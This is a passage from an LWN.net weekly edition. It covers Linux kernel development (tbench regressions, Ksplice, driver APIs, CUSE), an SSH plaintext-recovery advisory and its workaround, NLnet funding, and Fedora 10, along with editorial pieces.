case it is opening up use of libvirt &amp; virtualization to a set of
users who have only ever had access to closed source virtualization
technology. Portability broadens the pool of potential contributors to
your project. Open source developers on the various BSDs, OpenSolaris,
and Windows all have the potential to make valuable contributions to
your project.


[ We would like to thank Richard and Dan for taking time to answer our
questions. ]

		Tbench troubles II


LWN has previously covered
concerns over slowly deteriorating performance by current Linux systems on
the network- and scheduler-heavy tbench benchmark.  Tbench runs have been
getting worse since roughly 2.6.22.  At the end of the last episode,
attention had been directed toward the CFS scheduler as the presumptive
culprit.  That article concluded with the suggestion that, now that
attention had been focused on the scheduler's role in the tbench
performance regression, fixes would be relatively quick in coming.  One
month later, it
would appear that those fixes have indeed come, and that developers looking
for better tbench results will need to cast their gaze beyond the
scheduler.


The discussion resumed after a routine weekly posting of the post-2.6.26
regression list; one entry in that list is
the tbench performance issue.  Ingo Molnar responded to that posting with a pointer to an
extensive set of benchmark runs done by Mike Galbraith.  The conclusion
Ingo draws from all those runs is that the CFS scheduler is now faster than
the old O(1) scheduler, and that "all scheduler components of this
regression have been eliminated."  Beyond that:


	In fact his numbers show that scheduler speedups since 2.6.22 have
	offset and hidden most other sources of tbench
	regression. (i.e. the scheduler portion got 5% faster, hence it was
	able to offset a slowdown of 5% in other areas of the kernel that
	tbench triggers)


This improvement is not something that just happened; it is the result of a
focused effort on the part of the scheduler developers.  Quite a few
changes have been merged; they all seem like small tweaks, but, together,
they add up to substantial improvements in scheduler performance.
One
change fixes a spot where the scheduler code disabled interrupts
needlessly.  Some others (here
and here)
adjust the scheduler's "wakeup buddy" mechanism, a feature which ties
processes together in the scheduler's view.  As an example, consider a
process which wakes up a second process, then runs out of its allocated
time on the CPU.  The wakeup buddy system will cause the scheduler to bias
its selection mechanism to favor the just-waked process, on the theory that
said process will be consuming cache-warm data created by the waking
process.  By allowing cooperating processes like this to run slightly ahead
of what a strictly fair scheduling algorithm would provide, the scheduler
gets better performance out of the system as a whole.

The recent changes add a "backward buddy" concept.  If there is no recently-waked
process to switch to, the scheduler will, instead, bias the selection
toward the process which was preempted to enable the outgoing process to
run.  Chances are relatively good that the preempted process might
(1) be cooperating with the outgoing process or (2) have some
data still in cache - or both.  So running that process next is likely to
yield better performance overall.

A number of other small changes have been merged, to the point that the
scheduler developers think that the tbench regressions are no longer their
problem.  Networking maintainer David Miller has disagreed with this assessment, though,
claiming that performance problems still exist in the scheduler.  Ingo responded
in a couple of ways, starting with the posting of some profiling results which show very little
scheduler overhead.  Interestingly, it turns out that the networking
developers get different results from their profiling runs than the
scheduler developers do.  And that, in turn, is a result of the different
hardware that they are using for their work.  Ingo has a bleeding-edge
Intel processor to play with; the networking folks have processors which
are not quite so new.  David Miller tends to run on SPARC processors, which
may be adding unique problems of their own.

The other thing Ingo did was, for all practical purposes, to profile the
entire kernel code path involved in a tbench run, then to disassemble
the executable and examine the profile results on a per-instruction basis.
The postings that resulted (example) point
out a number of potential problem spots, most of which are in the
networking code.  Some of those have already been fixed, while others are
being disputed.  It is, in the end, a large amount of raw data which is
likely to inspire discussion for a while.

To an outsider, this whole affair can have the look of an ongoing
finger-pointing exercise.  And, perhaps, that's what it is.  But it's
highly-technical finger-pointing which has increased the understanding of
how the kernel responds to a specific type of stress while also
demonstrating the limits of some of our measurement tools and the
performance differences exhibited by various types of hardware.  The end
result will be a faster, more tightly-tuned kernel - and better tbench
numbers too.

		NLnet Foundation seeks projects to fund


A little-known organization—at least outside of its native home in the
Netherlands—has quietly been funding various free software projects
to the tune of roughly €2.5 million a year.  Most of those projects
have been in the Netherlands or Europe, but it is looking to expand
its reach to
the rest of the world.  It is "actively encouraging"
submissions of funding proposals for
projects that involve network technology and will be released as open
source, according to NLnet Foundation Director
Valer Mischenko.


The Foundation grew out of the Netherlands' first internet provider, NLnet,
which laid the original backbone along the rails in that country.  In 1998,
it was 
sold to UUNet and the proceeds were invested into the Foundation.  The
intent of the money was to fund technology, particularly internet
technology.  Because the internet depends on interoperability, it just
makes sense to require
projects that are funded to release their code, Mischenko says.


The Foundation prides itself on being quick to answer requests for funding
as there are "not too many bureaucratic layers" to the
organization.  Projects that try to get government funding often fall
behind because it takes so much time and effort to get a grant of some
kind—the technology may well have moved on.  Depending on the size of
the project, and the amount of funding required, answers can come as
quickly as just a few weeks.


Each year, two themes are chosen to focus on so that projects in those
areas get priority for funding.  For 2008, those themes are "Identity, 
Privacy, and Presence" and "Open Document Format" (ODF).
While ODF is not directly connected to network technology, the internet
will be a poorer place without open formats that can be freely shared.


Part of the ODF effort was helping governments understand the importance of
open formats in general and ODF in particular.  One of the outcomes of that
work was that all agencies in the Netherlands must start using open formats or
justify why they cannot.


The ODF theme is just one area where the Foundation has broadly interpreted
its mission.  It has helped fund the FSF Europe (FSFE) Freedom Task
Force project for several years.  In addition, it provided €200,000
to help pay for
Eben Moglen's time to work on GPLv3 at the FSF.  Mischenko notes that
it is important for the foundation to fund things that will help
"protect the network"; he and the board see these efforts
as important in that regard.


The bulk of funding this year has gone into the Identity, Privacy, and
Presence theme.  A list of
the currently funded projects has a number of interesting entries from
support for Tor hidden
services and an improved
routing algorithm for GNUnet to
hardware projects such as RFID Guardian and e-Passport.


The current structure of funding is made up of four "layers", each
corresponding to how much the Foundation will provide as well as how long
it will provide funding for.  The first layer is for things like funding trips
for developers and other community members to attend conferences and the
like.  The second layer is for commitments of up to €30,000.
Currently around 15% of proposals for second layer funding are granted.


For larger projects, the third layer can provide 2-4 years of funding of up
to €500-600,000 per year.  The fourth layer projects are currently
fixed for the next five years as the Foundation is funding DNSSEC work at
NLnet Labs as well as work on intelligent agents at Vrije
Universiteit Amsterdam. 


Mischenko said that the board is "willing to hear about ideas that
don't fit into the layers".  He said that the Foundation will
continue its current funding model "unless we hear a great
world-changing idea that we put all our money in and then we are
gone".  It is not just projects that can be funded by the
Foundation, any person, company, or organization can apply. "As long as
it is a network technology and it will be put in open source", the
Foundation will consider funding it.


[ Along those lines, the author would like to thank the NLnet Foundation for
helping to fund his recent
trip to the co-located NLUUG autumn
Mobility conference and Embedded Linux
Conference Europe in Ede, the Netherlands. ]

		SSH plaintext recovery vulnerability


A somewhat mysterious SSH
vulnerability has been reported in a way that unfortunately looks a bit
like partial disclosure.  In
this case, though, there is a workaround that is supposed to alleviate the
problem, so there are good reasons—as opposed to publicity-oriented
reasons—to announce the flaw.  While it is difficult to
exploit, it does expose up to 32-bits of
plaintext from within an SSH 
session which is a failure mode that is rather worrisome.


The flaw has only been confirmed in OpenSSH 4.7p1, but the announcement
indicates that it is likely to be much more widespread: "We expect
any RFC-compliant SSH implementation to be vulnerable 
to some form of the attack."  The flaw is in the design of SSH and
can allow an attacker who has "control over the network"—presumably
the ability to monitor and inject traffic—to recover 32 plaintext
bits with a very low probability (2-18).  The bits recovered
come from an 
attacker-selected block of ciphertext.  The attack leads to the termination
of the SSH connection, so iterative attacks will be difficult or impossible.


It is hard to get too worked up about that kind of attack, even with much
of the details lacking, but typically these kinds of flaws can be expanded
in various ways.  The announcement mentions variants that recover 14 bits
with a probability of 2-14.  It also carries the following
warning: "The success probabilities for 
other implementations are unknown (but are potentially much higher)."
It is a security tautology that vulnerabilities only get bigger over time,
which we have seen in various contexts, notably in DNS cache poisoning
flaws over the years.


Another bit of information provided by the Centre for the Protection of 
National Infrastructure (CPNI), the UK government agency who issued the
advisory,  is that the attack analyzes "the behaviour of the SSH
connection 
when handling certain types of errors".  This particular attack is
also only applicable to the default cipher-block
chaining (CBC) mode, so switching to counter
(CTR) mode works around the flaw.


OpenSSH supports the use of AES in CTR mode, which is what the advisory
recommends using:

A switch to AES in counter
mode could most easily be enforced by limiting which encryption
algorithms are offered during the ciphersuite negotiation that takes
place as part of the SSH key exchange (see RFC 4253, Section 7.1).


There is quite a bit of information in the advisory that might lead a
determined attacker in the "right" direction.  It might also provide enough
for someone to come up with attacks that are more probable and/or reveal
more plaintext.  So far, the Internet Storm Center is reporting that they
have not seen any evidence that the flaw is being exploited in the wild.


OpenSSH has not, as yet, addressed the issue, at least on their security page.  At least in
its current form, there is probably very little to worry about from this
flaw, but very security-conscious SSH users will want to apply the workaround.


		Interview with Paul Frields


Paul Frields is the Fedora Project Leader and in the days before the Fedora
10 release he was giving telephone briefings to the media.  I took
advantage of about an hour of Paul's time to talk about Fedora and the
Fedora 10 release.  The following article is based on that conversation.

To begin with, we talked about Fedora's new Special Interest Group (SIG)
for servers running
Fedora.  Fedora is a fast-paced distribution, and therefore not
suitable for all servers.  There are many places Fedora makes an excellent
server, though.  Some of those uses are: in house, non-internet facing
servers or servers with a separate firewall.  It is used in server farms
and home servers, and other places where the 13 month life cycle is not a
problem.  The roadrunner
supercomputer, a hybrid cluster with both IBM PowerXCell and AMD
Opteron processors runs both Red Hat Enterprise Linux and Fedora.
Roadrunner holds the number 1 spot
in the top500 list.

Fedora is more than a bleeding edge desktop, although it is good at that.
Fedora sponsors the development of many projects through FedoraHosted.org, and provides many
other contributions to upstream projects.  Extra Packages for Enterprise
Linux (EPEL) is a
community effort by Fedora developers to provide high-quality add-on
packages that complement Red Hat Enterprise Linux and its compatible
spinoffs such as CentOS or Scientific Linux.  Fedora also contributes to
The One Laptop Per Child (OLPC) project.
Fedora does serve many needs.

Including those of "remixers", the creators of derivative distributions.
The new trademark
guidelines, still in draft form, are designed to spell out the DOs and
DON'Ts of creating a remix.  Remixers can chose packages from the official
Fedora repository, EPEL, RPMFusion and
other repositories.  Packages can also be built from source, with or
without patches; to create the distribution they want.

Naturally, I asked Paul about the infrastructure/security problems that
were announced
last August.  LWN covered the issue in August and September.  We have yet to see a final
analysis of what happened.  Paul did say that a team of Red Hat engineers
and Fedora volunteers rebuilt everything from scratch, and signed the
packages with new keys.  Beyond that, we were told that the investigation
is ongoing and more information will be available once the investigation is
complete.

Fedora 10 was announced this week, along
with the RPM Fusion and ATrpms repositories, updated for Fedora 10.
Here are some highlights of this release.

With Fedora 9 it became possible to create a persistent USB device, that is
a key that can be updated, remember settings and store some data. With
Fedora 10 you have all that, plus you can encrypt your home directory on
the key.

The new NetworkManager
features connection sharing to enable collaboration everywhere.  PackageKit advances the software
management system with its ability of using yum, apt, conary, and other
existing tools.  PackageKit can search for codecs, listen to dbus and
communications between applications.  With the long-term roadmap for
PackageKit, this utility will understand what packages you need and will
get it for you.  F10 has faster boot times, kernel mode settings and
improved virtualization with KVM.

Paul said that the number of Fedora Ambassadors
doubles each year.  The ambassador program is world-wide, with people who
represent the Fedora Project to the wider public, help spread the word
about Fedora, Linux, and Open Source, become a point of contact for local
community members and channel the feedback to Fedora Project, help recruit
project contributors and think of creative ways for promoting Fedora.

Fedora 10 has more official spins than
ever before.  These are specialized distributions that contain only
packages in the main Fedora repository.  A small sampling includes the
Fedora Electronics Lab (FEL) Spin, Fedora KDE Desktop, Fedora Edu/Math Spin
and Fedora XFCE Desktop.  So check out Fedora 10, or one of the many spins
and remixes that are available.

		The Grumpy Editor's Asian Tour


Your editor, having actually managed to spend a few weeks at home, once
again succumbed to the allure of long-distance travel.  What is life, after
all, without jet lag, economy-class seats, and airline meals?  The excuse
this time was the combination of the Linux Foundation's Japan Linux Symposium
and the Consumer Electronics Linux Forum's Korea
Technical Jamboree.  Both events are intended to increase
communications with the Asian technical community and encourage
participation in the development process.  They are also an opportunity for
developers from other parts of the world to learn more about what their
colleagues are thinking.


This trip was your editor's second Japanese adventure, so it is interesting
to look at what has changed over the intervening 16 months.  The
organization of the event remains about the same, down to the
pizza-and-sushi party at the end of the first day.  The agenda was more
heavily oriented toward filesystems this time around, along with an
overview of control group resource controllers by Hiroyuki Kamezawa.  There
was a big difference, though, in how the discussions went.  Japanese
audiences are notoriously quiet and unwilling to ask questions, but the
attendees at the Japan Linux Symposium have gotten over this constraint.
Questions and discussion abounded - and this is a good thing.  Free
software development does not work well if people are unwilling to ask
questions or raise concerns.  The fact that Japanese developers seem to be
becoming more willing to participate in this way bodes well for their
participation in the process as a whole.

How much are these developers participating now?  Your editor did a quick
and unscientific pass over the changes merged for the 2.6.28 kernel.  It
appears that a full 5% of those patches came from Japanese developers.  If
we exclude the work of one prolific developer who currently lives in Europe, it
can be said that about 4% of 2.6.28 came from Japan itself.  There has been a
distinct increase in the amount of kernel code coming from that part of the
world, and that can only be a good thing.  The Linux Foundation's events in
Japan (which began in the OSDL days and have been occurring regularly for a
few years now) are, perhaps, producing the intended result.

Partly in recognition of the larger role now played by Japan in the free
software community, the Japan Symposium will be taken to a higher level
next year.  The 2009 Kernel Summit will be held in Tokyo in October,
followed by an expanded, three-day Symposium hosting talks by developers
from all over the world.  Planning for this event is just getting underway;
expect the call 
for papers to come out early next year.  It should be an interesting
gathering in a fun city; your editor is already looking
forward to attending.

The Korea Technical Jamboree was a lower-key gathering, held for a single
afternoon on the 25th floor of a Seoul skyscraper.  It lacked some of the
infrastructure of the Japan Symposium (simultaneous translation, for
example), but made up for it in enthusiasm.  Your editor found a
highly-engaged group of developers interested in talking about the
technology.  While much of the discussion was, surprisingly enough, in
Korean, your editor was able to figure out that virtualization is high on
the list of topics that this group was interested in.

There was also talk of business models and more.  What there was less of,
though, was talk of working with the community.  From this brief encounter,
your editor can guess that the Korean community is still working through
the stage of figuring out what it can get from free software.  Developers
there seem to have, for the most part, not yet reached the point of
sharing control of our free operating system and driving it
in directions which better suit their needs.  By their own admission,
Korean developers are a little behind their Japanese counterparts in this
regard, but that situation may not last for long.

One event your editor was not able to attend was FreedomHEC Taipei, held at
the same time.  Harald Welte was there, though, and posted a
brief report:


	I was really happy about FreedomHEC. It is really about time that
	the Linux world and the Taiwan-based chipset vendors and system
	integrators start much more interaction. It is a simple economic
	fact that a lot of hardware development, both in the PC mainboard,
	Laptop as well as the embedded device space happens in Taiwan. It
	is also very true, that for whatever reason the gradual Linux
	revolution in the server and desktop market in the EU, the US and
	other markets such as Southern America has not really reached
	Taiwan.


Harald concludes that a higher Linux awareness in Taiwan should lead to
better hardware support worldwide.  With any luck at all, events like
FreedomHEC, like those in neighboring regions, will help to create that
awareness and expand our global development community.


Your editor was also unable to attend FOSS.in
this year, despite a desire to return to that part of the world.  FOSS.in
is experimenting with a new event plan which is strongly oriented toward
the production of tangible results; it has clearly been influenced by the
success of the Linux Plumbers Conference.  India has vast numbers of
capable developers, relatively few of whom actively participate in our
community now. 
That number has been growing, though, and events like FOSS.in have a lot to
do with that change.


Finally: while your editor saw a lot of people expressing enthusiasm
for Linux, many of them seemed to be doing it with Windows laptops.  It
seems that the value of Linux has not yet made itself felt in the desktop
setting, even among those whose job it is to develop for or promote Linux.
It would be interesting to know why more of this work can't move off of
proprietary platforms.


Some of the answer may be related to episodes like this: your editor had
rashly upgraded his laptop to a new stable distribution release (we'll call
it Incredibly Irritating for the purposes of this discussion) just prior to
traveling.  The
obligatory check to ensure that video projection still worked got forgotten
this time; it had always worked before, what could go wrong this time?  But
it seems that this "upgrade" moved the tools needed to interface with
RandR into a separate package, which it did not bother to install.  So it
was not possible to tell the laptop to send video out the external port.


Suffice to say that, five minutes prior to giving a talk, while
disconnected from the network, one does not want to hear "you need to
install this package before I'll turn on your external video port" from
one's computer.  Your editor will accept the blame for not having verified
this functionality before traveling, but, still: things like this should
Just Work, especially with a distribution which claims to have invested
much energy into making such things Just Work.  The presenters using
Windows laptops were not having to contend with this kind of challenge.


That little glitch notwithstanding, this trip was a big success.  The
hospitality was amazing, interest was high, and there is always value in
seeing how other groups are approaching free software.  Our community
continues to grow; many good things will come from that.

		Ksplice and kreplace


Rebooting a system to apply a security update is a pain.  In some
situations, it's more than a pain; for various reasons, many systems cannot
be taken down at all without compromising the work they are supposed to be
doing.  Back in April, LWN looked
at Ksplice, a mechanism designed to enable the installation of kernel
updates without the need to reboot the system.  Since then, work has
continued on Ksplice, a new
version has been posted, and the project is starting to push toward
mainline inclusion.  So another look is called for.

The core idea behind Ksplice remains the same: when given a source tree and
a patch, it builds the kernel both with and without the patch and looks at
the differences.  To that end, the compilation procedure is modified to
put every function and data structure into its own executable section.
That makes life a little harder for the compiler and the linker, but
developers are notably insensitive to the difficulties faced by those
tools.  With things split up this way, it is relatively easy to identify a
minimal set of changes in the binary kernel image which result from the
patch.  Ksplice can then, with some care, patch the new code into the
running kernel.  Once this work is done, the old kernel is running the new
code without ever having been rebooted.

This technique works well for code changes, but different challenges come
with changes to data structures.  Back in April, Ksplice could not handle
that kind of change.  Even so, the project's developers claimed to be able
to apply the bulk of the kernel's security updates using ksplice.  Since
then, though, the developers have applied some energy to this problem.
With the addition of a couple of new techniques - which require extra
effort on the part of the person preparing the patch for Ksplice - it is
now possible to apply 100% of the 65 non-DOS security patches released for
the kernel since 2005.

In some cases, a kernel patch will simply require that a data structure be
initialized differently.  The way to handle this change in an update
through Ksplice is to modify the relevant data structures on the fly.  To
effect such changes, a patch can be modified to include code like the following:


While Ksplice is applying the changes - and while the rest of the system is
still stopped - the given func will be called.  It can then go
rooting through the kernel's data structures, changing things as needed.
For example, CVE-2008-0007
came about as a result of a failure by some drivers to set the
VM_DONTEXPAND flag on certain vm_area_struct structures.
Ksplice is able to apply the fix to the drivers without trouble, but that
is not helpful for any incorrectly-initialized VMAs present on the running
system.  So the
modifications to the patch add some functions which set
VM_DONTEXPAND on existing VMAs, then use ksplice_apply()
to cause those functions to be executed.  The result is a fully-fixed
system.

Changes to data structure definitions are harder.  If a structure field is
removed, the Ksplice version of the patch can just leave it in place.  But
the addition of a new field requires more complicated measures.  Simply
replacing the allocated structures on the fly seems impractical; finding
and fixing all pointers to those structures would be difficult at best.  So
something else is needed.

For Ksplice, that something else is a "shadow" mechanism which allocates a
separate structure to hold the new fields.  Using shadow structures is a
fair amount of additional work; the original patch must be changed in a
number of places.  Code which allocates the affected structure must be
modified to allocate the shadow as well, and code which frees the structure
must be changed in similar ways.  Any reference to the new field(s) must,
instead, look up the shadow structure and use that version of the field.
All told, it looks like a tiresome procedure which has a significant chance
of introducing new bugs.  There is also the potential for performance
issues caused by the linear linked list search performed to find the shadow
structures.  The good news is that it is only rarely necessary to modify a
patch in this way.

The Ksplice developers do not appear to be done yet; from the latest patch
posting:


	We're currently working on the problem of making it feasible to
	apply the entire stable tree using Ksplice.  Although Ksplice's
	original evaluation focused on patches for CVEs, we understand the
	idea that "security bugs are just 'normal bugs'"  (i.e.,
	tracking security bugs separately from normal bugs can be difficult
	and isn't necessarily advisable).  We ultimately want to provide to
	long-running machines hot updates for all of the bug fixes that go
	into the corresponding stable tree.


This is an ambitious goal; a single stable series can add up to hundreds of
changes, some of which can be reasonably large.  It will be interesting to
see how many users are really interested in this particular sort of update;
sites running critical systems tend to have older "enterprise" kernels
which are no longer receiving stable tree updates.  But a Ksplice which is
flexible enough to handle that kind of update stream should also be useful
for distributors wanting to provide no-reboot patches to their customers.

Meanwhile, Nikanth Karthikesan has posted a facility called kreplace.  On the surface, it
looks similar to Ksplice, but the goal is a little different: its purpose
is to allow a developer to quickly try out a change on a running kernel.
Kreplace works by simply patching out and replacing one or more functions
in the kernel.  Kreplace may have its value, but the initial reaction has
not been greatly enthusiastic.  Among other things, it has been pointed out that Ksplice also has a facility
to allow for quick experimentation with changes - though it will be quick
only if the developer is already set up to use Ksplice with the running
kernel.

A final concern with either of these solutions is that they are, for all
practical purposes, employing rootkit techniques.  A mechanism which can be
used by distributors to patch running systems can also be (mis)used by others.
Vendors of binary-only modules could, for example, use Ksplice or kreplace
to get around GPL-only exports and other inconvenient features of
contemporary kernels.  Crackers could also use it, of course, but they
already have their own rootkit tools and gain no real benefit from an
officially-supported runtime patching mechanism.  Whether this aspect of
Ksplice is of concern to the development community may be seen in the
coming months as this code gets closer to mainline inclusion.

		Driver API: sleeping poll(), exclusive I/O memory, and DMA API debugging


There are currently a number of proposed driver API changes being discussed
on the lists.  None of them are major, but they are worth being aware of.

poll()

Most of the functions in the file_operations structure are
concerned with I/O.  So it is not surprising that these functions are
allowed to sleep.  Except that, as it turns out, one of them -
poll() - cannot.  There is nothing inherent in the poll()
or select() system calls which would require the driver
poll() callback to be nonblocking; this requirement is, instead, a
result of the implementation.  In essence, the core poll()
implementation looks like this:


The problem is relatively straightforward: if a specific driver chooses to
sleep in its poll() callback, the current task state will get set
back to TASK_RUNNING and schedule_timeout_range() will return
immediately.  So a sleeping driver turns the main loop into a busy-wait.

The solution, as developed by
Tejun Heo, is also straightforward.  His patch causes
sys_poll() to define a custom wakeup function which, in turn, sets
a new triggered flag when called.  That eliminates the need to put
the process into TASK_INTERRUPTIBLE for the duration of the main
loop; that can be done, instead, right before actually sleeping.

Most driver writers can remain unaware of this change, which looks highly
likely to be merged for 2.6.29.  But, for those who need it, there will be
one more degree of flexibility in the implementation of poll()
callbacks.

Exclusive I/O memory

For a while, developers involved in the hunt for the e1000e corruption
bug thought that the X server might be the problem.  The real bug
turned out to be elsewhere, but the suspicion cast upon X led to the
development of a new API designed to make it harder for user-space programs
to interfere with the operation of an in-kernel driver.  

In particular, it seemed sensible to prevent user space from manipulating
I/O memory which has been allocated by device drivers.  This can be
achieved by not allowing an mmap() call on /dev/mem to
map regions already given to drivers.  If the STRICT_DEVMEM
configuration option is set, the kernel will protect its own memory from
mapping by user space; protecting I/O memory is really just a matter of
extending that mechanism.

Arjan van de Ven has implemented that feature in his MMIO exclusivity patch.  He
chose, however, not to make this protection the default.  Instead, drivers
which want exclusive access to an I/O memory region should call one of
these new functions:


There is also a new, low-level allocation macro:


In each case, these functions are equivalent to their non-exclusive
cousins, except for the changed name and the resulting exclusive
allocation.

There may be cases where a developer wants to be able to map a region from
user space on a development system, regardless of what the driver thinks.
For such situations, there is a new iomem=relaxed boot parameter.
When relaxed is selected, exclusive allocations are not enforced.
Clearly this is not an option which one would want to set on a production
system, but it may be useful in development environments.


DMA API debugging

The last topic is not actually an API change, but it's worth a look
anyway.  The kernel provides a nice API for setting up DMA operations.  In
many cases, the associated functions do little or no work; the system they
are running on does not require any additional effort.  The result is that
a lot of "tested" driver code may, in fact, have serious errors in its use
of the DMA API.  When those drivers are run on a different system - one
with an I/O memory management unit (IOMMU) in particular - those errors
could lead to no end of unpleasant behavior.

Kernel developers like the idea of finding bugs before they bite users on
remote systems.  To help make that happen with the DMA API, Joerg Roedel
has posted a new DMA API
debugging facility.  This feature, when built into the kernel, should
make it possible to find a number of previously-hidden bugs in device
drivers.  It has, in fact, already turned up a few problems with in-tree
drivers, mostly in the networking subsystem.

Use of this facility simply requires enabling a configuration option; the
API itself does not change.  Once it's enabled, this code will check for a
number of problems, including freeing DMA buffers with a different size
than was given at allocation time, freeing buffers which were never
allocated at all, mixing coherent and non-coherent functions on the same
buffer, confusion over I/O directions, and more.  Each of these problems
might slip by on a developer's test system, but might create havoc where an
IOMMU is being used.  When a problem is found, a warning and stack
traceback are logged.

The response to this API has been positive.  The biggest complaint seems to
be about the fact that this API is implemented as an x86-specific feature.
So it will probably have to be made generic before merging - after all,
developers on other platforms are entirely capable of introducing
DMA-related bugs too.  Once it goes in, this feature should probably be
enabled on any system used for driver development.

		Character devices in user space


There is a lot of functionality—things like filesystems and device
drivers—that are normally considered to be kernel tasks, but have,
over time, been allowed to move into user space.  The UIO user space driver framework
came along in 2.6.23, while filesystems in user space (FUSE) have been
around since 2.6.14.  Tejun Heo would like to see this idea broadened even
further with the character
devices in user space (CUSE) patches.


At first blush, the uses for a character device implemented in user space
are not obvious.  Looking a bit deeper, though, one finds numerous
programs—both open and closed source—that rely on legacy
character drivers.  Those drivers are currently in the kernel, but need not
be if there were a way to implement them in user space.  In addition,
older, deprecated interfaces, such as Open Sound System (OSS) can be better
supported without constantly fiddling with the in-kernel emulation.

 Providing better OSS support is one of the prime motivators for CUSE as
Heo announced in a linux-kernel posting
introducing the OSS
proxy.  The proxy uses CUSE to implement the /dev/dsp,
/dev/adsp, and /dev/mixer devices that programs using OSS
expect.  Adrian Bunk didn't necessarily see
this as a good thing: 
 Sorry for being
destructive, but 6 years after ALSA went into the kernel we are slightly
approaching the point where all applications support ALSA.   The
application you list on your webpage is UML host sound support, and I'm
wondering why you don't fix that instead of working on a better OSS
emulation?  


But Heo sees the current state of OSS emulation as a rather complicated
mess that, for better or worse, needs cleaning
up: 

We now have in-kernel OSS emulation which can't mux with other streams,
aoss [ALSA OSS emulation] with its own supported and broken list and can
also be routed 
through PA [PulseAudio] by configuring ALSA right and then padsp [PA OSS
emulation] with its own
supported and broken list and nothing works good enough.  So, if we have
one thing which just works, we can in time put all those to rest.


But there are other uses for CUSE too.  Greg Kroah-Hartman notes that legacy 
software for talking to Palm Pilots, much of which is binary-only, expects
to talk to a /dev/pilot serial port.  The kernel carries around a
driver, but "a libusb userspace program can handle all of the data to
the USB device instead".  So CUSE could be used to eventually remove
another crufty driver from the kernel, while still maintaining
compatibility with old user space code.


CUSE is implemented on top of FUSE as there is a fair amount of overlap
between them.  Character devices and filesystems implement many of the same
file operations—things like open(), close(),
read(), and write()—which makes them a good match.
Heo has a separate patchset for
FUSE that implements additional operations for filesystems some of
which will be used by CUSE.


The additional FUSE operations include an implementation of
ioctl() that is necessarily rather ugly.  Because an
ioctl implementation can access memory in unpredictable
ways—and those data structures can be arbitrarily deep—there
needs to be a mechanism for user-space CUSE devices to read and write that
memory.  The CUSE server does not have direct access to the caller's
memory, so a multi-step
ioctl() with retries must be implemented.  This particular bit of
ugliness is only allowed for in-kernel use, so that CUSE (or other
things like it) can allow "unrestricted" ioctl() implementations.
All FUSE filesystems are still required to have "restricted"
ioctls where the kernel can determine the direction and amount of
data that is transferred.
poll() support has also been added to FUSE, which, in turn,
requires a separate patch that allows poll() callbacks to sleep
(described in this article).


Once the FUSE changes are in place, the actual implementation of CUSE is
relatively small, weighing in around 1000 lines plus some housekeeping to
rename and export FUSE symbols.  At its core, it collects up a FUSE-mounted
filesystem that connects to the user-space implemented device along with
the kernel-exported character device, binding the two together.  FUSE
handles the interaction with the user-space code, in the same way that it
does for a filesystem. 


CUSE creates a device for commands, /dev/cuse, which is opened by
a program that wants to implement a particular character device.  CUSE
queries the opener to determine which device it is implementing and then
creates the device node.  For most operations, CUSE just hands off to FUSE,
but for open() it, instead, opens a file from the FUSE mount,
storing the file handle for use by later operations. 

 In many ways, CUSE is a kind of impedance matching layer that creates
something that acts like a character device, but has no hardware directly
behind it.  This allows CUSE to ignore things like hardware interrupts;
those would need to be handled by something else, typically a downstream
driver—the soundcard driver in the OSS proxy case.  This is one of
the big differences between UIO and CUSE.  UIO is much more like a regular
kernel device driver that requires kernel code to handle interrupts.  CUSE
drivers, on the other hand, can be created without ever touching kernel
space.  
 The only objection so far seems to be Bunk's complaint about supporting
OSS when it has been deprecated for so long.  As Heo points out, though,
there are still many applications that only support OSS.  In addition, all
of the code that has been submitted is "way smaller than the
in-kernel ALSA OSS emulation which is somewhat painful to use these
days", Heo says.  Since there are
other potential users of CUSE, not just the OSS proxy, it would seem that,
absent any major objections, CUSE could make it into 2.6.29.  

		An open letter to Evgeniy Polyakov


[Editor's note: the following article may look like a message to a
specific kernel developer, but it is really about the development process
in general.  Over the years, your editor has seen too many worthy hackers
run into development process problems; the end result is often that we lose
that person's contributions.  We are not so rich that we can afford that
sort of loss.  The desire to prevent such problems was the motivation
behind your editor's recently-written development
process document - and this letter.]


Dear Evgeniy,

Your editor has chosen to write to you in a public manner because he hates
to see talented developers get frustrated with the kernel process and storm
off.  We do not have an excess of capable hackers, especially those who can
work at your level.  Losing one hurts.  Your editor hopes that this
eventuality can be avoided in this case - for you, and for others who may
be encountering the same sort of frustrations you are.  Getting code into
the kernel can be a pain, sometimes.  That said, some 1160
developers have managed it since the opening of the 2.6.28 merge window in
October.  It is possible to get code merged with sufficient care.

You first posted your distributed storage (DST) patch back in 2007; LWN took a look at it at that time.
Since then, this code has come a long way.  Beyond the basic task of
exporting (and accessing) storage volumes across the net, this code claims
"bullet-proof memory allocations," zero-copy transport, failover recovery
with full transaction support, support for IPv6 and beyond, and a number of
features including encrypted data channels.  And, it is said, this code is
fast.  In general, it looks like good stuff.

You have posted the DST code on the mailing lists a number of times - too many,
apparently, for your tastes.  Frustration with the process appears to have
led to the behavior described in your recent weblog post:


To understand the roots of this issue, I made a simple experiment with the
previous DST release. I added following lines into the patch to catch
reviewer's eyes: 


As you may expect, this does not compile and thus was never read by the
people who are subscribed to the appropriate mail lists. I got one private
mail about this fact for the whole week. The same DST code (without above
lines) was sent public first time more than month ago and was resent 3
times after that. 

That's why I do not care about DST inclusion anymore. I do not care about
its linux-kernel@ feedback.


So, because the fourth posting of identical code in one month received
little attention, 
DST now risks joining Kevents, network channels, network tree memory
management, asynchronous crypto, and more in that place where dusty,
out-of-tree 
stuff lives.  This would not be a good outcome.  So let us look at what can
be done to avoid that - for your sake, for DST users' sake, and for the
sake of other developers who may follow.

One way to get more reviews for your code is to pay attention to what those
reviewers are saying.  Andrew Morton spent some
time on DST back in October.  He had a number of concrete requests -
such as documenting the user-space ABI and the network protocol - which
have not been satisfied.  He also asked for better code documentation in
general:


	So please.  Go through all the code and make it tell a story.  Ask
	yourself "how would I explain all this to a kernel developer who is
	sitting next to me".  It's important, and it's an important skill.


The November 25, 2008 version
of DST still does not tell that story, and that makes it very hard for
other developers to understand.  Code review, as you know, is in critically
short supply in most free software projects.  Getting reviews for
difficult-to-understand code is hard, especially when it is a large body of
complex code which occupies a niche in which relatively few developers have
expertise.  So it's not surprising that your most recent comment involved
white space - anybody can make that kind of review without any need to
actually understand what's going on.

Not only does your patch not tell a story, but the individual pieces of it
do not even contain changelogs.  For a patch set marked "consider for
inclusion," that is a fatal error.  Playing along with the system on things
like that can seem like a waste of time, especially if you hold out no real
hope of the patch being merged, but it is a necessary sign of respect for
the people you are asking to consider the patch.  No maintainer will accept
a patch without a changelog.

While we're on the topic of documentation, your kernel configuration help
text reads, in its entirety:


